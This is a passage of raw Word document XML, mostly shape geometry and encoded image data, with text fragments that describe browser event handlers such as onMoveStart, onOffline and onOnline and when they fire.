                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 349 167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Text Box 96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onMoveEnd()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62" o:spid="_x0000_s1470" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:49.85pt;height:9.15pt;z-index:-17608192;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167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">
                <v:shape id="Freeform 964" o:spid="_x0000_s1471" style="position:absolute;left:1930;top:167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SozcQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE78L+h/AW9iJrqoJoNYooC3tYBet6fzbP&#10;tti81CbV+u+NIHgcZuYbZrZoTSmuVLvCsoJ+LwJBnFpdcKbgf//zPQbhPLLG0jIpuJODxfyjM8NY&#10;2xvv6Jr4TAQIuxgV5N5XsZQuzcmg69mKOHgnWxv0QdaZ1DXeAtyUchBFI2mw4LCQY0WrnNJz0hgF&#10;m8tErtflednd/p0a1xwPx6HuK/X12S6nIDy1/h1+tX+1gsloAM8z4Qj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kqM3EAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,349;21,349;18,349;0,328;0,325;0,188;21,167;976,167;997,188;997,328;979,349;976,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 963" o:spid="_x0000_s1472" type="#_x0000_t202" style="position:absolute;left:1930;top:167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1zC8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/KE3nSjhVBTV5GiIBSKMR48vmaf&#10;yWL2bcyumv77rlDwOMzMN8x82dtG3KjzxrGCyTgBQVw6bbhScCg2o3cQPiBrbByTgl/ysFy8DOaY&#10;aXfnnG77UIkIYZ+hgjqENpPSlzVZ9GPXEkfv5DqLIcqukrrDe4TbRk6TJJUWDceFGlv6rKk8769W&#10;werI+dpcvn92+Sk3RTFL+Cs9K/U67FcfIAL14Rn+b2+1gln6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zXML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onMoveEnd()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8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>move</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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page)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673"/>
          <w:tab w:val="left" w:pos="1674"/>
        </w:tabs>
        <w:ind w:left="1673" w:hanging="148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0880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741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="958" name="Group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6205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="959" name="Freeform 961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1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167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67" h="183">
                                <a:moveTo>
                                  <a:pt x="114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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114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Text Box 96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11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onMoveStart()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9" o:spid="_x0000_s1473" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:58.35pt;height:9.15pt;z-index:-17607680;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="116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">
                <v:shape id="Freeform 961" o:spid="_x0000_s1474" style="position:absolute;left:1930;top:154;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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a8zMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPUWvCMBSF3wf7D+EO9jJmOpljVqNMYVAQH3T+gEtz&#10;bYvNTUnSNv77RRB8PJxzvsNZrqNpxUDON5YVfEwyEMSl1Q1XCk5/v+/fIHxA1thaJgVX8rBePT8t&#10;Mdd25AMNx1CJBGGfo4I6hC6X0pc1GfQT2xEn72ydwZCkq6R2OCa4aeU0y76kwYbTQo0dbWsqL8fe&#10;KNhvN7HA3eh8LIb+s387HeT1otTrS/xZgAgUwyN8bxdawXw2h9uZd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WvMzEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1146,182l21,182r-3,l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,21l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,336;21,336;18,336;0,315;0,312;0,175;21,154;1146,154;1167,175;1167,315;1149,336;1146,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 960" o:spid="_x0000_s1475" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:116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/tfMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPPWvDMBDdA/0P4gLdYjkdTONaMSE0UCiUOs7Q8WJd&#10;bGHr5Fhq4v77aih0fLzvopztIG40eeNYwTpJQRA3ThtuFZzqw+oZhA/IGgfHpOCHPJTbh0WBuXZ3&#10;ruh2DK2IIexzVNCFMOZS+qYjiz5xI3HkLm6yGCKcWqknvMdwO8inNM2kRcOxocOR9h01/fHbKth9&#10;cfVqrh/nz+pSmbrepPye9Uo9LufdC4hAc/gX/7nftIJNFufH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/tfM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onMoveStart()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8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>move</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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page)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504"/>
          <w:tab w:val="left" w:pos="1506"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:hanging="1316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0931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633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="955" name="Group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166"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="956" name="Freeform 958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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997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Text Box 95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onOffline()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6" o:spid="_x0000_s1476" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:49.85pt;height:9.15pt;z-index:-17607168;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 958" o:spid="_x0000_s1477" style="position:absolute;left:1930;top:166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Nkc8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE78J+h/AWvIimKopWo8jKwh5UWP/cn82z&#10;LTYv3SbV+u2NIOxxmJnfMPNlYwpxo8rllhX0exEI4sTqnFMFx8N3dwLCeWSNhWVS8CAHy8VHa46x&#10;tnf+pdvepyJA2MWoIPO+jKV0SUYGXc+WxMG72MqgD7JKpa7wHuCmkIMoGkuDOYeFDEv6yii57muj&#10;YPs3let1cV11dptL7erz6TzUfaXan81qBsJT4//D7/aPVjAdjeF1Jh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c2RzxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,348;21,348;18,348;0,327;0,324;0,187;21,166;976,166;997,187;997,327;979,348;976,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 957" o:spid="_x0000_s1478" type="#_x0000_t202" style="position:absolute;left:1930;top:166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q/tcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxUKupq4goFAQxpoceX7PP&#10;ZDH7Ns1uNf57Vyh4HGbmG2a+7GwtLtR641jBeJSAIC6cNlwq+Mq3wykIH5A11o5JwY08LBf93hxT&#10;7a6c0eUYShEh7FNUUIXQpFL6oiKLfuQa4uidXGsxRNmWUrd4jXBby9ckmUiLhuNChQ2tKyrOxz+r&#10;YPXN2cb87n8O2SkzeT5LeDc5K/Uy6FYfIAJ14Rn+b39qBbO3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mr+1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onOffline()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(occurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>working</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>starts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>work</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>offline)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420"/>
          <w:tab w:val="left" w:pos="1421"/>
        </w:tabs>
        <w:ind w:left="1420" w:hanging="1231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0982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579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="952" name="Group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154"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="953" name="Freeform 955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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912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Text Box 95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onOnline()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3" o:spid="_x0000_s1479" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:45.6pt;height:9.15pt;z-index:-17606656;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 955" o:spid="_x0000_s1480" style="position:absolute;left:1930;top:154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OdLMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WoCMRSE7wu+QziCd5pVsepqFCmttlAQfx7gsDlu&#10;Fjcnu5tU17dvCkIvh5n5hlmuW1uKGzW+cKxgOEhAEGdOF5wrOJ8++jMQPiBrLB2Tggd5WK86L0tM&#10;tbvzgW7HkIsIYZ+iAhNClUrpM0MW/cBVxNG7uMZiiLLJpW7wHuG2lKMkeZUWC44LBit6M5Rdjz9W&#10;Qb3dF8S791Fdezc9Zd/GfM1bpXrddrMAEagN/+Fn+1MrmE/G8Hc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TnSzEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,336;21,336;18,336;0,315;0,312;0,175;21,154;890,154;912,175;912,315;894,336;890,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 954" o:spid="_x0000_s1481" type="#_x0000_t202" style="position:absolute;left:1930;top:154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ghws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qajD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SCHC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onOnline()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(occurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>working</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>offline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>starts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>work</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>online)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673"/>
          <w:tab w:val="left" w:pos="1674"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="1673" w:hanging="148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1033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741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="949" name="Group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6205"/>
                          <a:chOff x="1930" y="167"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="950" name="Freeform 952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1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
